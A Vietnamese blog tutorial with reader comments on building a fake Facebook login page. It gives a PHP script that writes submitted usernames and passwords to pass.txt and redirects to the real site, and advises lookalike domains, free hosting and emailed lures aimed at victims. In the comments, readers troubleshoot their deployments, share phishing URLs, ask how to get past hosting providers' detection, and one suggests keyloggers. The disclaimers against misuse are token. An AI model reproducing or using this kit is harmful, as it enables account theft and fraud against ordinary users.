Nghe hack facebook thì các bạn có thể nghỉ rằng chắc là lừa đảo hay chém gió cho vui, cũng bởi vì facebook là một tập đoàn mạng xã hội lớn nhất hiện tại, hệ thống server, bảo mật của nó là thứ thuộc dạng “siêu nhân” hết rồi, nhưng chúng ta cũng biết rằng, không có 1 căn nhà nào hoàn hảo cả, thế nào cũng phải có lổ cho những con kiến chui vào. ^^
Nói cho vui thôi, thật chất là với khả năng gà mờ của mình thì chẳng thể làm gì thằng facebook cả, mục đích là vọc phá cho vui, ở đây chúng ta sử dụng phương pháp phishing để đánh lừa nạn nhân. Phương pháp này thì cũng thuộc dạng cổ điển nhưng vẫn rất hiệu quả, đã được nhiều hacker dùng để lấy cắp thông tin tài khoản ngân hàng hay các thông tin bí mật khác. Trong bài viết này, mình sẽ hướng dẫn sử dụng 1 cách cơ bản và dễ nhất cho mọi người nhưng cũng đòi hỏi bắt buộc các bạn phải có 1 chút kiến thức về web, hosting. Còn nếu không có thì phải tìm hiểu cách tạo 1 trang web miễn phí rồi hãy đọc tiếp.
Vào vấn đề chính, mục đích của chúng ta là đánh lừa nạn nhân rằng họ đang ở website của facebook (nhưng thật chất là web fake của mình tạo ra thôi) và đăng nhập tài khoản với password vào, lúc này tài khoản và password sẽ tự động gửi về host của mình.
Và 1 điều cần nói là hy vọng các bạn không sử dụng phương pháp này để quậy phá hay có hành vi trộm cắp thông tin cá nhân của người khác, chủ yếu là để vọc phá thôi.
Các bạn vào trang chủ của facebook : www.facebook.com
Click chuột phải vào vùng trống và chọn view source (firefox) hoặc view page source (chrome), nó sẽ ra 1 trang toàn là chữ với chữ, chúng ta copy hết nguyên đống code này về bỏ vào 1 file notepad, save lại với tên file là index.html để nó thành 1 web tĩnh. Bạn có thể mở nó lên lại thử xem có phải hiện ra trang đăng nhập của facebook ko.
Sau đó mở lại file index lên bằng notepad, nhấn Ctr + F để mở khung tìm kiếm, bạn gõ chữ “action” và nhấn find để tìm, nó sẽ tìm tới dòng có dạng như sau thì dừng lại: action=”http:// http://www.facebook.com/login.php?login_atempt=1“, lúc này bạn thay dòng http:// http://www.facebook.com/login.php?login_atempt=1 trong ngoặc kép thành phishing.php, save lại.
Xong phần web fake, giờ chúng ta tạo mới 1 file notepad với nội dung như sau:
<?php
header (‘Location:http://www.facebook.com/’);
$handle = fopen(“pass.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>
Chúng ta save file này lại với tên phishing.php. Tổng cộng ta có 2 file là index.html và phishing.php
Bây giờ tới phần hosting, các bạn có thể tạo host miễn phí tại bytehost.com, và tên miền miễn phí tại dyn.com/dns .Các bạn nên đặt 1 cái tên miền nào liên quan tới facebook để dễ đánh lừa người khác dạng như facebook.dyndns.com hay facebooks.dyndns.com , facebook.bytehost7.com
Sau khi tạo và kết nối xong host với domain, chúng ta vào phần contolpanel của hosting, rồi kiếm mục file manager, trong file manager ta sẽ thấy có thư mục htdocs doc or publish_html (host khác), chúng ta vào trong thư mục đó xóa file index.htm trong đó nếu có, sau đó chọn upload và up 2 file phishing.php và index.html từ máy tính lên thư mục này.
Chúng ta vào vào website bằng tên miền vừa đăng ký ở trên thử xem kết quả, nếu ra giao diện của trang đăng nhập trên face là ok. Còn nếu chưa được thì kiểm tra lại xem hosting và tên miền.
Thật chất chỗ này không khó, nhưng đòi hỏi phải có chút kiến thức về hosting và tên miền thì mới làm được, các bạn có thể đăng ký hosting và tên miền miễn phí của nhà cung cấp nào cũng được, Mục đích chính của chúng ta là up 2 file phishing.php và pass.txt lên host để tạo thành một web fake đơn giản và chạy trên internet. Bạn nào dân IT thì có thể tự làm trên localhost rồi tự NAT qua ngoài chạy cũng được.
Tới đây coi như là xong 90% rồi, chỉ còn việc gửi đường link website này đi cho nạn nhân với 1 nội dung như báo cáo sự cố hay cần update thông tin trên facebook thông qua mail kèm theo đường link website fake của mình, tùy theo khả năng mời gọi của mỗi người mà nạn nhân dễ sập bẫy hơn. Đại loại như vầy:
Khi nạn nhân nhấn vào link nó sẽ vào web fake của mình nhưng giao diện là của trang đăng nhập facebook, nếu may mắn thì sẽ không bị nghi ngờ tên miền, nạn nhân sẽ điền thông tin để đăng nhập, và khi login, website sẽ tự động chuyển về trang chủ facebook, coi như mất dấu vết.
Sau khi nạn nhân điền thông tin đăng nhập và login thì nó sẽ tự động gửi về hosting 1 file tên là pass.txt
Các bạn vào file manager, trong thư mục chứa file phishing.php, các bạn sẽ thấy file này, mở ra sẽ thấy được tên tài khoản và password tài khoản đó.
Thế là xong, hy vọng các bạn không dùng nó để làm điều xấu, có thể dùng nó để test trên bạn bè cho vui nhằm biết thêm một vài trick hack cho vui.
Chúc các bạn may mắn.
Yahoo: minhtuyen909
Mail: tmtuyen89@gmail.com
Blog: tran minh tuyen
mở file index ở đâu thế bạn ! nó là 1 trang web tĩnh mở bằng notepad sao được
bạn có thể nói rõ hơn hok, mình chưa hiểu ý bạn
sao mình tạo xong 2 file rồi..úp lên host mình thử test mà nó k gửi file pass.txt về bạn giúp mình với
lập host với tên miền kiểu j thế bạn
bạn nhấn chuột trái vào index đó , có chữ ” Open With ” đó mà k biết tạo trang 😦
bạn ơi ! mình không tạo được đuôi miền miễn phí …tạo thế nào thế bạn
mình cũng bị như thế, ko bik sao nữa, bạn đã tạo được chưa?
co ai hack tai khoan fb dung minh k. minh tra tien lai cho
http://facebookdangki.byethost7.com/
nhưng k thấy gửi về z ad
có thể cho m bit sai chỗ nào k?
http://facebookcome.tk/ minh cung the?ko biet gui veef dau nua
tạo thêm 1 file viết —ko phải file chứa dữ liệu nha. Xong đặt tên pass.txt
http://faceboocke.xtgem.com/facebook.html
mình cũng k thấy gì
tạo host là như thế nào hả bạn.tớ vào trang rồi mà chưa biết tạo ntn cả.giúp tớ chút nhé
Bạn chịu khó google vụ này dùm mình nhé, trên mạng nhiều lắm..:)
bạn ơi, mình đã làm được web fake và host, nhưng khi nhập user, pass facebook và login thì không thấy file pass.txt trong thư mục có chứa file phish.php, vậy là sao hả bạn, có thể hướng dẫn tiếp dùm mình không. Tks bạn rất nhiều
Có thể do đoạn code trong file fishing, hiện tại facebook mới nâng cấp nên cách này có thể chưa dùng được, mình sẽ update sau…:)
Oh, bạn cho mình hỏi làm sao để kết nối domain với host vậy? Có vẻ khá phức tạp. Please
Tuyên ơi, gửi link cái web của mình cho nạn nhân bằng cách nào vậy?
Cái này mình biết chỉ sao bây giờ, mỗi người có 1 thủ thuật khác nhau để đánh lừa nạn nhân mà
Hihi, vậy T biết cách nào thì chỉ luôn cho mình cách ấy vậy, đi mà ^^
cho mình hỏi làm sao để đăng kí tên miền miễn phí tại dyn thế !? mình đăng kí mà toàn bắt nhập payment
à, trang dyn hết cho free nhé bạn, bàn dùng no-ip đi, nó còn free thì phải
mình sử dụng hostinger.vn để làm host và giờ nó bị suspended do phát hiện phishing.h.facebook-1 là sao v bạn !?
nó phát hiện trang bạn là trang fake có chứa mã độc nên nó block tài khoản của bạn đó.
Mình sửa lại phishing thành login thì nó lại báo đoạn lỗi này là sao vậy bạn ?!
Parse error: syntax error, unexpected ‘:’ in /home/u568091045/public_html/login.php on line 2
Mình tạo dc như khi đăng nhập lại vào trang http://hotingger.com face của mình là http://giangnguyenfbfb.tk
Bạn check lại file notepad cho mình xem thử
mình cũng bị như bạn
sao mình làm xong thì bị hostingger nó xóa vậy giúp mình với
Hostinger ko dùng được bạn ơi, nó phát hiện code độc là xóa à, bạn dùng host cá nhân đi nhé
em sử dụng win xp thì vào contolpanel của hosting như thế nào vậy ad?
Control Panel của hosting chạy trên nền web, e chạy win gì đâu liên quan
hinh nhu minh da lam dc 😀
cha thay gui fine nao ve het http://facebookcome.tk/???sai cho nao
BẠN ƠI MÌNH KO TÌM THẤY CÁCH THẤY CACH THAY DÒNG ” http//….” bằng phishing.php
zo Controlpanel chổ nào v anh? có thể chỉ rõ hơn đc k?
bạn nên dùng hostinger.vn vào phần quản lý rồi mở File Manager là xong
bạn ơi, mình tạo host ở My3gb, nhưng sao khi gửi link nó báo block link là sao nhỉ
Đúng rồi bạn, nó phát hiện code độc đó, bạn phải tự dùng host cá nhân
bạn ơi sao mình mở nr lại bảo không nhận được dữ liệu
có cách nào vượt mặt được host kiểm duyệt không bạn mình up lên toàn bị phát hiện phising fb và bị xóa cmn luôn kai host đấy :v
Xài host cá nhân nha bạn, host free trên mạng có firewall hết nên ko dùng được đâu
Không có cách nào bạn ơi, host chùa là chắc chắn bị, trừ khi bạn mua host riêng thôi
Cho em hỏi là bây giờ em lập hostinger nhưng không biêta trỏ tên miền. Em phải làm sao ạ
À, e xài hostinger sẽ bị block đó, một là dùng máy tính cá nhân tự làm host, không thì thuê 1 cái host tư nhân mà làm cho dễ
sao lúc đăng nhập lại ko chuyển qa trang fb mà sang trang khác v! bác nào rành giúp e vs….. còn 2 tuần nữa e nộp đồ án r 😥
Nó là trang fake, làm sao vô facebook được em
minh ko bik lam cai hosting ban co the hd ko
Phải có kiến thức host nhé bạn
đã làm theo y hệ mà k có file pass.txt nào gửi về cả anh ơi
Em check lại file code xem sao
bạn cho mình hỏi bài này đã lâu rồi nhưng sử dụng còn được không?
Còn dùng được nhé bạn
http://thoitrangcuocsong.netai.net/ nó vào FC nhưng ko thấy gửi pass ve AD ơi giúp minh voi
Bạn check lại file code xem sao
ad ơi em tạo đc hết rồi e tạo trên my3gb cơ nhưng mà đăng nhập vào nó chả gửi về cj cả
Giờ chỉ tạo được 5 phút là hotsting tự động khóa tk lại luôn khó lừa lắm… muốn hack giờ chỉ có thể dung keyloger là hay nhất nhưng khó mỗi cái tải file về thì bị chặn hêt ui lừa đc tắt tường lửa là ok